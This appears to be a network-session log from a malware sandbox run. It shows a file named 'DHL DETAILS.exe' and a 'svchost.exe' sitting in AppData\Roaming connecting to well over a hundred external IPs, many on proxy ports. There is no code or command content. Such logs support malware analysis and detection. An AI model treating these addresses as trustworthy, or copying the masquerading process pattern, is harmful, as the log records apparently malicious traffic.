5783	192.168.2.5	55854	104.20.205.191	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5784	192.168.2.5	55874	172.67.182.153	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5785	192.168.2.5	55876	104.19.235.10	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5786	192.168.2.5	55585	93.90.212.2	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5787	192.168.2.5	55846	47.88.3.19	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5788	192.168.2.5	55896	45.12.31.104	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5789	192.168.2.5	55707	43.163.192.3	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5790	192.168.2.5	55909	104.23.100.73	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5791	192.168.2.5	55480	106.105.218.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5792	192.168.2.5	55921	104.238.111.107	7999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5793	192.168.2.5	55348	42.49.148.167	9001	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5794	192.168.2.5	53481	213.184.153.66	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5795	192.168.2.5	55617	61.133.66.69	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5796	192.168.2.5	53568	159.223.71.71	59159	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5797	192.168.2.5	55677	8.210.80.191	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5798	192.168.2.5	55680	43.155.170.35	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5799	192.168.2.5	56016	104.27.26.29	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5800	192.168.2.5	49782	162.241.6.97	63360	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5801	192.168.2.5	55996	199.188.93.214	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5802	192.168.2.5	55700	148.72.215.79	48623	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5803	192.168.2.5	50096	162.214.225.223	37581	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5804	192.168.2.5	53709	23.225.72.125	3503	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5805	192.168.2.5	54312	192.111.137.35	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5806	192.168.2.5	49628	13.81.217.201	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5807	192.168.2.5	56075	104.21.85.109	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5808	192.168.2.5	55710	119.23.148.173	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5809	192.168.2.5	56106	172.67.181.37	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5810	192.168.2.5	55753	18.133.16.21	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5811	192.168.2.5	53722	162.241.6.97	50563	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5812	192.168.2.5	55843	104.249.29.74	5767	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5813	192.168.2.5	56167	104.23.141.196	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5814	192.168.2.5	56236	104.19.124.112	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5815	192.168.2.5	56246	172.64.152.98	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5816	192.168.2.5	56226	162.159.242.230	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5817	192.168.2.5	56216	104.19.138.4	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5818	192.168.2.5	56278	104.24.15.158	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5819	192.168.2.5	49879	92.205.110.47	14936	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5820	192.168.2.5	55812	128.199.187.210	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5821	192.168.2.5	55819	62.33.207.202	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5822	192.168.2.5	55875	94.130.94.45	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5823	192.168.2.5	55890	193.84.89.202	8443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5824	192.168.2.5	55924	107.148.201.157	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5825	192.168.2.5	55889	154.12.178.107	29985	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5826	192.168.2.5	55939	18.185.169.150	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5827	192.168.2.5	56132	38.162.8.226	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5828	192.168.2.5	56138	191.102.160.157	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5829	192.168.2.5	56317	104.16.107.206	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5830	192.168.2.5	50177	161.97.173.42	62289	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5831	192.168.2.5	56338	162.159.242.104	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5832	192.168.2.5	50098	176.194.189.40	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5833	192.168.2.5	56026	1.15.62.12	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5834	192.168.2.5	55956	39.99.144.43	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5835	192.168.2.5	55834	80.249.112.162	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5836	192.168.2.5	50019	103.74.100.190	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5837	192.168.2.5	55746	124.160.118.183	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5838	192.168.2.5	55954	178.54.21.203	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5839	192.168.2.5	56034	13.40.239.130	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5840	192.168.2.5	56334	209.121.164.50	31147	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5841	192.168.2.5	55957	148.66.130.187	5630	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5842	192.168.2.5	56070	194.145.209.187	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5843	192.168.2.5	55997	120.37.121.209	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5844	192.168.2.5	56254	181.78.11.218	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5845	192.168.2.5	56125	82.113.157.122	31280	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5846	192.168.2.5	62419	103.172.42.237	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5847	192.168.2.5	56427	104.20.34.100	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5848	192.168.2.5	53663	154.118.228.212	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5849	192.168.2.5	56062	43.131.242.162	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5850	192.168.2.5	56033	195.87.217.75	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5851	192.168.2.5	56784	202.159.60.65	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5852	192.168.2.5	55904	103.190.54.141	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5853	192.168.2.5	56819	202.159.60.65	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5854	192.168.2.5	62463	51.81.186.179	58630	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5855	192.168.2.5	64591	203.76.121.237	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5856	192.168.2.5	56824	202.159.60.65	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5857	192.168.2.5	56825	202.159.60.65	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5858	192.168.2.5	56827	41.86.252.91	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5859	192.168.2.5	56833	41.86.252.91	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5860	192.168.2.5	56133	37.235.53.208	6789	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5861	192.168.2.5	56858	41.86.252.91	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5862	192.168.2.5	56863	41.86.252.91	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5863	192.168.2.5	56121	94.45.74.60	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5864	192.168.2.5	56575	203.30.191.34	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5865	192.168.2.5	53603	72.49.49.11	31034	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5866	192.168.2.5	56600	104.19.5.247	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5867	192.168.2.5	56127	148.66.130.53	15345	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5868	192.168.2.5	56641	104.16.108.42	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5869	192.168.2.5	56693	104.20.235.179	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5870	192.168.2.5	56208	185.81.153.162	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5871	192.168.2.5	56143	61.178.152.31	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5872	192.168.2.5	56206	45.11.95.166	6004	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5873	192.168.2.5	56051	187.40.1.122	128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5874	192.168.2.5	56698	104.16.25.216	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5875	192.168.2.5	64639	47.184.175.164	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5876	192.168.2.5	50514	162.241.207.217	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5877	192.168.2.5	56003	223.112.53.2	1025	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5878	192.168.2.5	56323	1.194.236.229	5005	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5879	192.168.2.5	50368	27.65.240.157	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5880	192.168.2.5	56688	51.79.87.144	22500	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5881	192.168.2.5	56732	104.16.108.234	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5882	192.168.2.5	56733	172.67.69.9	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5883	192.168.2.5	55719	117.160.250.163	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5884	192.168.2.5	56472	125.141.139.60	5566	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5885	192.168.2.5	54041	46.219.1.5	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5886	192.168.2.5	56816	104.16.107.142	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5887	192.168.2.5	57188	43.157.51.43	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5888	192.168.2.5	56561	147.75.34.85	10007	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5889	192.168.2.5	57216	43.157.51.43	443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5890	192.168.2.5	57218	43.157.51.43	443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5891	192.168.2.5	56368	8.219.179.237	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5892	192.168.2.5	57222	43.157.51.43	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5893	192.168.2.5	54314	43.255.113.232	8083	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5894	192.168.2.5	56517	45.231.133.51	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5895	192.168.2.5	56640	16.163.88.228	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5896	192.168.2.5	56584	103.213.97.74	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5897	192.168.2.5	56638	51.75.126.150	34144	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5898	192.168.2.5	56642	91.189.177.189	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5899	192.168.2.5	56535	128.199.202.122	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5900	192.168.2.5	56776	67.205.162.103	14398	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5901	192.168.2.5	53028	89.145.162.81	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5902	192.168.2.5	56915	104.17.171.79	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5903	192.168.2.5	56937	185.238.228.202	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5904	192.168.2.5	56714	187.49.191.14	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5905	192.168.2.5	53899	41.223.232.117	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5906	192.168.2.5	56404	5.202.104.22	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5907	192.168.2.5	56955	104.27.12.22	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5908	192.168.2.5	56996	172.67.182.90	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5909	192.168.2.5	57013	172.67.182.22	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5910	192.168.2.5	56533	103.152.232.148	8085	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5911	192.168.2.5	54418	104.248.151.220	53177	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5912	192.168.2.5	62535	198.57.229.185	64767	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5913	192.168.2.5	56713	5.252.23.220	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5914	192.168.2.5	56708	45.11.95.165	6039	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5915	192.168.2.5	56697	103.242.119.88	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5916	192.168.2.5	50717	172.67.3.98	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5917	192.168.2.5	56930	107.180.88.41	58037	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5918	192.168.2.5	56719	88.99.138.21	6969	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5919	192.168.2.5	50972	156.232.9.194	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5920	192.168.2.5	57404	178.128.157.114	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5921	192.168.2.5	54727	50.63.12.101	17559	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5922	192.168.2.5	57407	178.128.157.114	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5923	192.168.2.5	57413	178.128.157.114	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5924	192.168.2.5	50410	103.59.203.209	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

